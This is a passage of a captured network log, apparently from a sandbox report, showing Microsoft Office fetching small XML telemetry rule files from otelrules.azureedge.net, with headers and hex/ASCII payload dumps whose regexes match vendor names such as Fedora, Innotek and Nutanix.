                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:27 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    71192.168.2.44982513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:27 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:27 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:27 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 416
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                    ETag: "0x8DC582BAEA4B445"
                                                                    x-ms-request-id: a1cd263b-b01e-0070-5f2a-271cc0000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130327Z-16849878b782d4lwcu6h6gmxnw00000004mg00000000hruq
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:27 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    72192.168.2.44982913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:28 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:28 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:28 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 471
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                    ETag: "0x8DC582B97E6FCDD"
                                                                    x-ms-request-id: 628e7349-b01e-003d-63fd-24d32c000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130328Z-15b8d89586fdmfsg1u7xrpfws000000009c00000000038n7
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:28 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    73192.168.2.44982713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:28 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:29 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:29 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 479
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                    ETag: "0x8DC582B989EE75B"
                                                                    x-ms-request-id: 18fe904c-c01e-00a1-4257-277e4a000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130328Z-16849878b787wpl5wqkt5731b400000005rg00000000g463
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:29 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    74192.168.2.44983013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:28 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:28 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:28 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 419
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                    ETag: "0x8DC582B9C710B28"
                                                                    x-ms-request-id: c1b2f9d4-701e-0098-1062-26395f000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130328Z-16849878b786fl7gm2qg4r5y7000000005dg0000000037gq
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:28 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    75192.168.2.44982813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:28 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:28 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:28 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 415
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                    ETag: "0x8DC582BA80D96A1"
                                                                    x-ms-request-id: 3802ff33-701e-0001-4310-28b110000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130328Z-r197bdfb6b4g24ztpxkw4umce800000006ng000000004g8t
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    76192.168.2.44983113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:28 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:28 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:28 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 477
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                    ETag: "0x8DC582BA54DCC28"
                                                                    x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130328Z-16849878b786fl7gm2qg4r5y7000000005dg0000000037hb
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:28 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    77192.168.2.44983213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:29 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:29 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:29 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 419
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                    ETag: "0x8DC582BB7F164C3"
                                                                    x-ms-request-id: 03f0aa2d-d01e-007a-29f2-24f38c000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130329Z-15b8d89586fmhkw429ba5n22m800000006cg000000008b1x
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    78192.168.2.44983413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:29 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:29 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:29 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 419
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                    ETag: "0x8DC582B9FF95F80"
                                                                    x-ms-request-id: d13b9d4f-c01e-0014-770d-26a6a3000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130329Z-17c5cb586f66g7mvbfuqdb2m3n000000058g000000000r7p
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    79192.168.2.44983513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:29 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:29 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:29 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 472
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                    ETag: "0x8DC582BB650C2EC"
                                                                    x-ms-request-id: 9a8e6971-501e-0078-586f-2806cf000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130329Z-15b8d89586fmc8ck21zz2rtg1w000000026g0000000093tm
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    80192.168.2.44983313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:29 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:29 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:29 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 477
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                    ETag: "0x8DC582BA48B5BDD"
                                                                    x-ms-request-id: 2cfbf663-801e-0083-68dc-26f0ae000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130329Z-17c5cb586f6sqz6fff89etrx0800000004t0000000002kfd
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:29 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    81192.168.2.44983613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:30 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:30 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:30 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 468
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                    ETag: "0x8DC582BB3EAF226"
                                                                    x-ms-request-id: cbc40ba7-201e-0003-72af-27f85a000000
                                                                    x-ms-version: 2018-03-28
